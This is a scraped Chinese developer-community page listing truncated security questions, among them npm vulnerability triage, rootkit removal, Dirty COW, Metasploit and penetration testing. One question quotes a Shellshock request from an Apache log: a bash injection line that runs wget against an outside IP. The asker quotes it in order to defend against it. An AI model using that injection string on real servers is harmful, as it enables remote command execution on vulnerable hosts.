腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
精选内容/技术社群/优惠产品,
尽在小程序
立即前往
文章
问答
视频
沙龙
1
回答
是否有方法检查npm包引入的漏洞是否可访问/可利用
、
、
、
我遇到了一个问题,在用过时的npm包引入的几百个存储库中,我有太多的漏洞。问题是,我需要找到一种优先排序的方法。对我来说,最大的痛苦是工程团队想要证明漏洞的利用,所以他们修补了这个包。 是否有任何工具可以用来检查一个易受攻击的包是否真的对应用程序构成威胁?我知道Snyk是可触及的,但它只用于Java项目,我需要一些nodejs。
浏览 0
提问于2022-04-28
得票数 1
1
回答
是否有任何公司或团体致力于安全硬件架构?
我的印象是,成熟的类Unix操作系统不太容易受到特洛伊木马的攻击,这主要是因为内核代码调试良好,包括正确使用硬件内存保护。对吗? 是否有任何公司或团体致力于设计硬件架构,以防止应用程序代码中的漏洞--即使操作系统不像Unix,甚至存在木马? 谢谢。
浏览 0
提问于2013-06-10
得票数 2
1
回答
Iso 27K实施
、
、
、
假设我们购买了一个新的思科路由器或任何IT设备。我们如何在技术上采用ISO 27k/NIST 800-37/NIST 800-53或任何其他相关的信息安全管理标准?我是说我们该怎么办?我们应该安装软件来检查它的漏洞吗?或者我们应该检查一下设备是否有众所周知的漏洞,并消除它们? 提前谢谢。
浏览 0
提问于2016-11-23
得票数 0
回答已采纳
1
回答
量化不升级Android (即Android8.1到更新版本)的风险
、
我正在运行一个Android One (即谷歌支持的普通Android )手机,其中有Android8.1。我已经解锁了引导程序并将我的设备进行了根植。 因为我的设备已经扎根,我已经有近一年无法将“系统更新”应用到我的手机上了。重新查看我看到的可用版本,新版本是Android 9,需要完全重新安装。 我意识到我真的很喜欢我的系统,我不想做任何改变,事实上,我担心一些很酷的功能可能会被禁用(比如改变MAC地址的能力,停止在预设的水平上充电手机的能力)。 来自安全POV的 ,在一个过时的Android8.1版本上运行的真正风险是什么,假设我对我安装的应用程序是明智的,并且不去点击广告/垃圾邮件?
浏览 0
提问于2019-08-08
得票数 0
1
回答
Chromium和Firefox的主要安全差别是什么?
、
、
我不知道如何在Firefox和Chromium的安全模型之间得到一个知情、公正的比较。我尝试过搜索它,但我发现的只是随机新闻网站上的一些不知情的轶事,而且大多数结果都已经过时了,而且没有提到这些浏览器的当前版本。 普遍的共识似乎是,由于更好的沙箱实现,铬在安全性方面更优越,但我不知道这是否属实。这两种浏览器的安全模型有什么主要区别?
浏览 0
提问于2017-01-03
得票数 3
1
回答
在给定服务器上安装的多个内核版本的漏洞
、
、
根据排除或显示未运行Linux内核的漏洞.: 在单个Linux主机上检测到多个内核是可能的,Qualys将报告在所有Linux内核上发现的所有漏洞。 Linux发行版支持多个内核版本的并行安装。在安装新内核时,会自动创建一个引导项和一个initrd,因此不需要进一步的手动配置。那么,我是否真的需要关注为旧安装的内核发现的漏洞(实际上,这些漏洞并不用于引导系统)?有风险吗?我的意思是,当然有人可能会争辩说,一旦有人访问了服务器,他/她就可以引导到一个较旧的(如果你愿意的话更易受攻击)安装的内核版本,但这首先需要根权限。
浏览 0
提问于2021-01-22
得票数 1
回答已采纳
1
回答
如何在asp.net c#中检查病毒扫描结果?
、
、
我有一个ajax上传器,允许用户上传图片到程序,将显示回给用户。在允许文件留在服务器上之前,我要检查此文件是否有病毒。下面是它将文件发送到病毒扫描程序的代码。我希望能够看到扫描结果是否产生病毒,然后从服务器上删除它,如果它确实有病毒。 try { Process myProcess = new Process(); myProcess.StartInfo.FileName = @"C:\Program Files\AVG\AVG8\avgscanx.exe"; //myProcess.StartInfo.FileName=@"C:\Program
浏览 2
提问于2011-08-04
得票数 0
回答已采纳
1
回答
稀疏文件最好的Linux文件系统?
在某些文件系统中,分配新文件时使用的块是为了避免重用。当用于稀疏文件时,这样的设置会导致文件大小不断增大。是否有一个文件系统在为新文件分配块时会尽可能地重用磁盘空间,以减缓稀疏文件的增长?
浏览 0
提问于2013-12-02
得票数 3
回答已采纳
1
回答
我可以从.rar文件中获得恶意软件而不用在Android中打开它吗?
、
、
我当时在一个有将近20万人的小组里,在电报里。其中一位成员(可能是新来的,他的帐户现在被删除了)给我(以及其他人)发送了一个名为“客户存款H.rar”的文件,我立即删除了它,并使用Kasperky Free分析了我的Android9.0手机。 如果我不打开文件,有什么可能被感染(我没有分析文件,我假设文件上有恶意软件)? 换句话说,正如标题所说,我可以从.rar文件中获得恶意软件,而不用在Android中打开它吗? 我发现了另一个问题,但总是提到Windows。
浏览 0
提问于2021-04-26
得票数 1
回答已采纳
1
回答
Debian压缩和可用内存(缺1GB)
、
、
这里我有一个专用服务器,内存为12 and,运行Debian x64。 dmesg | grep Memory [ 0.004000] Memory: 11917152k/12259740k available (2279k kernel code, 333820k reserved, 1022k data, 216k init) 从几天以来,我有了另一台专用服务器(几乎相同的硬件),但是使用Debian挤压x64 (通过debootstrap安装,Kernel2.6.32-5-Xen-AMD 64) dmesg | grep Memory [ 1.551510] Memory:
浏览 0
提问于2011-01-10
得票数 1
2
回答
漏洞扫描主要是扫描什么?
、
请描述您的问题 [附加信息]
浏览 647
提问于2019-05-20
1
回答
如何删除SHV4 / SHV5 rootkit?
、
我已经看到我的系统有两种rootkits: SHV4 / SHV5。(我要在这里添加一个日志)我试图删除它,但我做不到。 有人能推荐我怎么做吗? [ Rootkit Hunter version 1.3.8 ] Checking system commands... /usr/bin/md5sum [ Warning ] /usr/bin/pstree [ Warning ] /usr/bin/top
浏览 0
提问于2013-07-19
得票数 0
2
回答
所有的漏洞都可以利用吗?
、
、
我理解漏洞和漏洞之间的区别,但是当我浏览漏洞数据库时,我看到了更多的漏洞和更少的漏洞。对于每个被发现的漏洞,难道不应该至少有一个漏洞被利用吗?不是所有的漏洞都可以利用吗? 我想说的是,当我在带有特定CVE ID的漏洞数据库上搜索漏洞时,无法保证可以利用该漏洞进行攻击。如果一个漏洞不能被利用,它如何被认为是一个漏洞?
浏览 0
提问于2017-04-07
得票数 7
回答已采纳
1
回答
漏洞1:1有漏洞吗?
、
、
我知道,在大多数情况下,在安全性定义方面,在很多问题上的想法都有一些细微的差异。 我要问的是,攻击是否被认为是利用特定漏洞,还是可以说多个漏洞利用了单个漏洞。例如,我们知道SQL通过SQL注入攻击有许多类型的攻击。我们是说SQL中通过发送意外命令来操作的漏洞本身就是漏洞,还是能够执行攻击操作的特定命令就是漏洞,这意味着它是1:1而不是1:*关系?
浏览 0
提问于2015-05-04
得票数 0
3
回答
Java 6上的TLS 1.2
、
、
、
我有一个在java 6上运行的遗留应用程序。但是,由于某些安全因素,我们需要升级到TLS 1.2。为此,我尝试了以下代码: import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; import java.net.URL; import java.net.UnknownHostException; import java.security.KeyManagementException; import java.security.NoSuchAlgorithmExce
浏览 0
提问于2017-08-29
得票数 0
1
回答
Linux“肮脏的奶牛”漏洞允许在虚拟机之外升级吗?
、
、
漏洞CVE-2016-5195处理Linux系统中的权限升级问题。 在虚拟机管理程序KVM和QEMU的虚拟环境中,虚拟机能够访问其主机吗?如果没有,这里的保护层是什么?
浏览 0
提问于2016-10-25
得票数 3
回答已采纳
1
回答
手动监视您的PC for Java (Oracle)漏洞?
、
撇开沙箱和AV不谈,如果我想手动查看/监视我的系统,查看它们通常进入的位置,我在哪里可以查找可能的恶意Java病毒/活动,例如,它们会首先显示在任务管理器或临时文件中吗? 有什么工具吗?
浏览 0
提问于2012-12-16
得票数 0
1
回答
我们能否通过不在服务器上安装新软件来避免崩溃/幽灵漏洞?
是否有可能不在服务器上安装新程序并避免任何熔毁/幽灵漏洞,因为这只是一个新发现的问题。 我有一个运行固定数据库负载的SLES服务器。它是一个英特尔Xeon的AWS (hvm) VPC在一个私人子网。回顾一下,自从该服务器一年多前启动以来,没有任何新的程序二进制文件或进程被添加到该服务器中。但是我们已经定期使用推荐的OS/DBMS补丁(这显然带来了新代码)。 根据我到目前为止所读到的,数据库类型的工作负载将受到修复带来的巨大性能影响。它已经在高峰时间以60%-80%的cpu运行,而且还在增长,所以我希望在2-3个月内升级到一个更大的服务器。 在这种情况下,跳过修复程序有意义吗?如果是的话,这要延
浏览 0
提问于2018-01-07
得票数 1
回答已采纳
1
回答
qcow2实际尺寸
、
、
我有点困惑于qcow2文件的真实大小。 ls -alh VMs/ubuntu-mini.qcow2 -rw------- 1 root root 21G mar 31 23:15 VMs/ubuntu-mini.qcow2 du -h VMs/ubuntu-mini.qcow2 2,7G VMs/ubuntu-mini.qcow2 我想将该文件复制到不同的分区(ext4)。看起来,这个命令实际上复制了21G,而不是我所期望的2,7G。现在,在新的位置,这两个命令(du和ls)向我展示了相同的大小- 21G。 du -h /media/HDD0/VMs/ubuntu-mini.qcow2
浏览 0
提问于2018-04-04
得票数 8
回答已采纳
3
回答
CWE与CVE的用法比较
、
CWE (通用漏洞枚举)和CVE (通用漏洞和暴露)有什么区别?它们的用法有什么不同?
浏览 4
提问于2013-07-20
得票数 13
3
回答
如果系统被更新,这是否意味着metasploit框架无法穿透系统?
、
、
我一直在学习metasploit,它是一个开发和有效载荷的框架。那么,如果系统被更新了,这是否意味着这些漏洞不再起作用了?你能再解释一下吗?
浏览 0
提问于2016-09-20
得票数 0
1
回答
如何知道我的系统是否易受ShockShell漏洞的影响?
、
最近发现的ShockShell漏洞会影响许多Linux和Mac系统,因为它们使用的是易受攻击的BASH。 我如何知道我是否容易受到这一攻击,以及如何保护自己不受攻击?
浏览 0
提问于2014-09-25
得票数 1
2
回答
DNS漏洞列表
我目前正在研究如何设置DNS服务器和DNS系统的所有方面。我也想研究一下安全方面的问题。我想在我的测试服务器上使用当前的DNS服务器攻击。是否有一个地方列出了当前黑客使用的攻击,以便我可以学习如何防止它们?
浏览 0
提问于2011-12-05
得票数 6
回答已采纳
1
回答
利用Java进行开发
、
、
我想知道是否有可能用java编写漏洞。 Eternalblue漏洞可以用perl、ruby甚至python编写,但是否可以用java编写呢? 我看不出有什么合适的办法。Python允许您很容易地获得目标系统信息,但是使用java可以吗?Java是独立于平台安装的,但是它除了用于软件开发和类似于开发开发之外,还能用于其他方面吗?
浏览 0
提问于2018-08-18
得票数 -1
回答已采纳
1
回答
我在Ubuntu上发现了病毒,该怎么办?
、
我的灯服务器上有病毒。(我想)根分区开始填充。但对于它装满了什么(没有原木),没有任何线索。重新启动后,根的使用空间返回到4% (正常)。我重新安装了服务器,但保存了旧的根文件以保留配置。 之后,我尝试删除保存的文件,它开始消失,只有一个文件,我不能删除根,然后有东西开始建立整个“旧”的根文件结构。所有被删除的文件夹都回来了。我需要格式化驱动器来摆脱它。不幸的是,我有另一份副本。我必须采取某种安全措施吗?
浏览 0
提问于2017-11-24
得票数 0
回答已采纳
1
回答
如何防止Apache将请求行作为bash命令执行?
、
、
、
我在Apache 2.2.22上运行了几个虚拟主机,刚刚注意到日志中发生了一个相当惊人的事件,来自冰岛的“安全扫描器”能够使用以下http请求行将一个文件放入cgi目录: () { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\" 它有效地下载了有关文件。 有人能解释一下这个请求是如何实际执行bash命令的吗? 当然,cgi-bin不应该是可写的,但是理解这种类型的利用函数以及如果没有方法来更改Apache配置参数以使请求命令永远不会被执行的话,还是有帮助的. 这可能与此无关,但几个小时后,从内部接口
浏览 3
提问于2014-09-29
得票数 0
回答已采纳
1
回答
在linux中可以创建一个固定大小的文件吗?
、
、
我需要一个功能,将创建一个固定大小的文件在linux。像truncate或fopen,fseek,fclose这样的函数不是一个解决方案,因为它们会用零填充打开的文件,但这不是必需的,我没有时间讨论这个问题。那么有没有什么函数可以只打开固定长度的文件,而不填充缓冲区呢? 提前谢谢。
浏览 4
提问于2011-08-23
得票数 1
回答已采纳
3
回答
什么是渗透测试?为什么要进行渗透测试?
、
渗透测试是测试人员的工作/任务吗? 什么是可用的渗透测试工具? 如何进行渗透测试?
浏览 0
提问于2016-04-05
得票数 0
回答已采纳
1
回答
在NVD cve列表2.0中,外地秃鹫--安全保护代表什么?
、
、
在枚举CVE的不同NVD文件中,可以找到这里。 不时有字段<vuln:security-protection>,通常包含值ALLOWS_OTHER_ACCESS或ALLOWS_ADMIN_ACCESS。 你知道这片土地代表什么吗?这意味着什么?
浏览 0
提问于2014-02-17
得票数 2
2
回答
只要Android设备不扎根,那么假设主手机应用程序没有被修改是安全的吗?
、
、
从鉴证学的角度来看,有没有技术上的可能性:如果这个潜在的网络罪犯没有找到这个设备,就会使用一个被操纵的系统手机应用程序来隐藏一些功能,比如通过第三方黑客/开发人员修改的秘密信息功能? 有一些定制的手机有这类应用程序,但我想知道这是否是可行的,而不制作一个定制ROM或生根设备(因为那样的演员有完全的控制)。
浏览 0
提问于2023-03-08
得票数 0
回答已采纳
1
回答
揭露JSON解析器StackTrace的大型保险网站
、
、
最近,我碰巧发现一家保险公司的api端点正在发送JSON解析器的StackTrace作为对内容字段中格式错误的JSON的http POST消息的响应。 端点的url指示它有保存由客户端发送的数据的任务。堆栈跟踪如下所示: JSON parse error: Unrecognized token 'nul': was expecting 'null', 'true', 'false' or NaN; nested exception is com.fasterxml.jackson.core.JsonParseException:
浏览 0
提问于2019-01-22
得票数 2
回答已采纳
4
回答
什么是收缩包装代码攻击?
在我的C=EH课程上,我听说过术语“收缩包装代码攻击”,但我们只提到过它。现在,我试图做一些研究和刷新主题,我似乎找不到这种攻击类型的严肃描述。 看看我在课程中收到的演示文稿,它只列举了几个句子来说明主要的观点(很明显,这些演讲并不是为了单独的学习)。 这个确切的短语似乎对C_h有点口语化,所以Google要么被上述实例淹没,要么对它有相当无用的重新解释。 那么这个收缩包装代码攻击的目的是什么呢? (有什么好的例子吗?或者故事,它是如何特别成功的?或有趣的链接?) 更新:这个软件上的Joel使用了术语"Shrinkwrap代码“,用于大规模生产和分发的一般类型的软件。 收缩包装是一种软
浏览 0
提问于2012-11-15
得票数 12
回答已采纳
1
回答
从CVE和MSB收集信息编写概念证明
、
我目前感兴趣的是如何为CVE和微软安全通讯每月发布的漏洞编写一些概念代码的证明。 这些网站列出了已经发生的漏洞,但没有解释漏洞是如何工作的。例如,Microsoft安全公告有一个非常通用的行,描述该漏洞是如何工作的- 巧尽心思构建的Microsoft文件 这没有给出任何信息,该漏洞是如何工作的。CVE也是有限的。我不明白为什么没有提供信息,因为补丁已经发布了。 网络上是否有我能知道最近发布的漏洞是如何工作的资源?
浏览 0
提问于2014-12-14
得票数 0
1
回答
多租户的安全风险
、
是否存在使用与其他公司已经共享的公司外围防火墙设备(提供多租户)相同的防火墙硬件的安全风险?如果其他公司受到像DDoS这样的攻击,即使在实践中是多租户,是否有可能影响我们的防火墙租户? 谢谢
浏览 0
提问于2017-04-17
得票数 1
1
回答
敏捷开发环境中的漏洞测试评估
、
、
、
详细信息: 我会对你们如何处理敏捷环境中的漏洞测试感兴趣? 示例: 您有每周一次的测试系列,在其中测试项目是否存在漏洞。发现的弱点会对你的产品造成持久的损害。 在敏捷开发中,您认为这些错误或漏洞有什么价值? 您定义了什么工作流?
浏览 0
提问于2021-10-27
得票数 0
2
回答
漏洞扫描调度方法随需求变化而变化?
我有一个关于安排漏洞扫描和评估工作的问题。 我正在制定漏洞扫描的时间表。我想知道什么时候,为什么要开始扫描,首先-什么条件应该需要这个要求。 是否应该在系统/应用程序设计或配置发生更改时启动此练习? 如果我采用这种方法,我就不得不质疑变化的正确性。这一改变是否得到批准,是否遵循了实施/引入变革的指导方针或最佳方式。 由于不遵守变更管理协议/程序所产生的风险并不是漏洞扫描器的直接责任,因此,如果不通过变更控制系统和其他手段(审计等)来处理这种风险,则该风险并不是直接责任。 当我知道是否遵循了适当的变更管理流程时,我为什么要浪费时间评估风险/测试漏洞,我不需要扫描。 那么,漏洞扫描是否应该由变化或
浏览 0
提问于2013-01-23
得票数 1
回答已采纳
1
回答
我应该遵循哪些最佳实践来保护我的windows server 2016 web server?
、
我有一个专用的服务器窗口服务器2016、IIS、Sql server 2018企业版和MS SQL server数据库。我使用这个服务器来托管我的dotnet核心应用程序,我通过远程桌面管理这个服务器。托管网站在服务器上安装了SSl证书。我想知道我应该应用的最佳实践是什么,以确保我的服务器以及我的托管web应用程序及其连接的SQL数据库的完全安全。此外,我还想知道是否有可信的工具可以测量我的服务器、web应用程序和SQL数据库的安全级别。 提前感谢
浏览 0
提问于2020-02-04
得票数 1
9
回答
漏洞还是漏洞?
软件错误和软件漏洞之间的区别是什么?
浏览 11
提问于2008-12-31
得票数 16
回答已采纳
2
回答
如何计算我们的应用程序安全债务?
、
、
、
、
应用担保债务与技术债务有一些相似之处,但在决定我们的安全债务负担是否过高并需要偿还时,几乎没有什么不同之处。我想知道如何在我们的银行申请中计算证券债务?
浏览 0
提问于2018-09-18
得票数 11
1
回答
我能追踪到“越狱”的程序吗?
、
、
如果一个进程实际上可以干扰其他进程,那么是否有可能跟踪它呢?打破僵局,我的意思是它克服了虚拟化,阻止一个进程与其他进程直接交互。
浏览 0
提问于2019-07-15
得票数 1
回答已采纳
1
回答
从共享切换到VPS的思考
、
由于我的需求变化,并找到一个VPS解决方案,每月只需额外一欧元,比我目前的共享计划,我正在考虑切换到VPS。 我主要关心的是安全和困难程度。 我非常习惯通过命令行配置/安装软件。我只是想知道在VPS中打开安全漏洞有多容易? 我会开始运行邮件,网络和svn服务器。如果安全的话可能还会添加音乐服务。 你们觉得怎么样?我会在这里踏入未知的世界吗?我应该忘记它,还是接受挑战:) 谢谢。
浏览 0
提问于2011-10-26
得票数 0
回答已采纳
5
回答
渗透测试与其他安全测试
、
我不知道渗透测试和其他形式的安全测试之间的区别。有经验的人能告诉我有什么不同吗?我真的很感激。顺便说一句,有没有模拟DoS的测试?我不知道如何防御它。
浏览 0
提问于2010-06-25
得票数 12
3
回答
随着自动更新功能的引入,信息技术的安全性是增加了还是减少了?
、
、
、
、
出于显而易见的原因,我们教用户 总是更新..。更新很好..。永远不要忘记更新,等等! 除了恶意广告的危险,利用它向用户表明他们需要“更新”,我希望这个问题集中在软件中的自动更新功能。 许多应用程序都引入了自动更新功能,用户基本上不需要再做任何事情,这样才能使他们的软件完全更新或修补,或者完全填充(不受欢迎的)新功能。作为一名安全专业人士,我对此的第一感觉是“很好,这会让世界变得更安全”,尤其是因为你删除了人类的交互,这些交互常常由于懒惰而导致失败,忘记更新,甚至忘了检查更新或任何导致缺乏更新的“人”原因,并开始自动修补已知的漏洞。 人们得到了大量不同的移动应用程序更新、操作系统更新和桌面应用程
浏览 0
提问于2016-08-04
得票数 4
回答已采纳
2
回答
从漏洞扫描手动验证漏洞
、
、
如何从漏洞扫描或供应商发布的漏洞中手动验证漏洞? 假设你收到了一份高漏洞的报告。漏洞扫描器使用标头的版本检查。如果没有针对此漏洞的公开攻击,如果无法在内部访问服务器,如何检查它?一个例子是CVE-2019-13917,我似乎找不到一个公共漏洞扔到服务器上来验证漏洞,我的最后一个资源是将它发送给负责的it团队。这是正确的方法吗?-如果没有公开的利用,唯一的办法是通过反向工程从供应商那里获得补丁来创造你自己的漏洞. Shodan漏洞扫描器给了我一份报告,它似乎在做版本检查,我需要验证这些漏洞是否真的是一个问题。 我知道版本检查很容易出现大量的假阳性,有什么办法可以避免吗?
浏览 0
提问于2021-05-27
得票数 1
1
回答
使用mysql根帐户执行根命令
、
、
、
假设我对mysql数据库有完全的根访问权,但没有根用户shell (linux)。如何使用对mysql数据库的完全根访问来执行根命令?
浏览 0
提问于2012-09-26
得票数 2
回答已采纳
2
回答
如果攻击者不知道未知的错误,服务器绝对安全吗?
、
如果服务器安装了所有已知错误的补丁,而攻击者无法进行0天的攻击,那么服务器绝对安全吗?
浏览 0
提问于2014-11-23
得票数 1
回答已采纳
2
回答
如何保护传统的Android智能手机免受新的攻击?
、
、
、
我的Android智能手机已经有很多年的历史了,尽管我仍然非常满意,但我真的不想把它换成新的。然而,供应商似乎不再发布更新了。除了安装新的CyanogenMod (它不是100%兼容的):相机和其他硬件都有问题。另外,我仍然使用的另一款旧手机根本不受任何定制from的支持),我如何保护自己免受每天都会发现的新Linux漏洞的影响?我的手机是有根有据的(有人可能会说,打根手机本身就是一个安全漏洞,但这是阻止所有由厂商预装并嵌入第三方应用程序的间谍软件的唯一方法),而且我可能会修补系统图书馆员,但不用说,我很难自己维护它们。
浏览 0
提问于2017-03-09
得票数 3
1
回答
使用代理服务器有什么安全好处?
、
、
用维基百科编写的是: 安全性:代理服务器是一个额外的防御层,可以防止某些OS和Web特定的攻击。然而,它并没有为针对web应用程序或服务本身的攻击提供任何保护,而web应用程序或服务本身通常被认为是更大的威胁。 操作系统和Web服务器特定的攻击是什么意思?
浏览 0
提问于2014-01-10
得票数 1
1
回答
什么是Ubuntu基础更新?
、
什么是Update ? 在安全情况下,这个补丁到底是什么? 我为什么要安装它?
浏览 0
提问于2017-03-22
得票数 3
3
回答
SCADA操作系统与安全利用
、
、
因此,我有一个基本的问题,SCADA操作系统,制造商没有披露。根据我的经验,我可以看到VxWorks在其中一些中运行,Windows或Linux在其中一些中运行。 对于用于特定目的的特定操作系统是否有任何分类? 如果您能对他们在SCADA系统中遇到的操作系统提供良好的信息,并对SCADA系统中的安全漏洞和漏洞进行深入了解,我将不胜感激。
浏览 0
提问于2011-07-06
得票数 5
回答已采纳
扫码
添加站长 进交流群
领取专属
10元无门槛券
手把手带您无忧上云
相关
资讯
安卓系统有漏洞,小心被攻击
苹果 Face iD 有漏洞,鸿蒙系统来了
【安全圈】再度发现Oracle漏洞!WebLogic系统高危漏洞,有在野利用,快修!
腾讯安全团队:谷歌AI学习系统有安全漏洞
iOS 9系统iBoot源代码泄露 有可能被黑客利用发现漏洞
热门
标签
更多标签
云服务器
ICP备案
对象存储
即时通信 IM
实时音视频
活动推荐
运营活动
广告
关闭
领券